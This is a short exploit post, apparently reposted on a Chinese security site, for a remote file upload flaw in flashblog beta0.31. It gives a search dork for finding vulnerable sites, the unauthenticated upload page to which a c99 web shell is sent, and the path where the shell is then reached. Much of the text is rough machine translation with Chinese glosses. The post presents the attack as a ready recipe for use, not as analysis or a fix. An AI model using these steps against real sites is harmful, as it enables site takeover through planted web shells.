首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

flashblog远程文件上传漏洞


http://www.gipsky.com/
来自 : < mefisto_at_hackermail.com >

日期 : 2008年5月29日6时57分21秒-0000

( '二元'的编码是不支持,存储为-是) flashblog beta0.31远程文件上传漏洞



# Author : MEFISTO ---- mefisto |at |hackermail |dot| com #作者: mefisto ---- mefisto |在| hackermail |点|的COM







# Dork : flashblog.html





# Website : www.dumenci.net

#网址: www.dumenci.net





http://[Site]/[script]/admin/Editor/imgupload.php ==>>> upload your c99 shell

(http:// [网站] / [脚本] /管理/编辑/ imgupload.php ==>>>上传您的c99 Shell)





http://[Site]/[script]/tus_imagenes/c99.php ==>>> your address

(http:// [网站] / [脚本] / tus_imagenes/c99.php ==>>>您的地址)
<< SQL注入攻击-来自微软安全博客的建议 上海受木马病毒控制计算机居全国首位 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号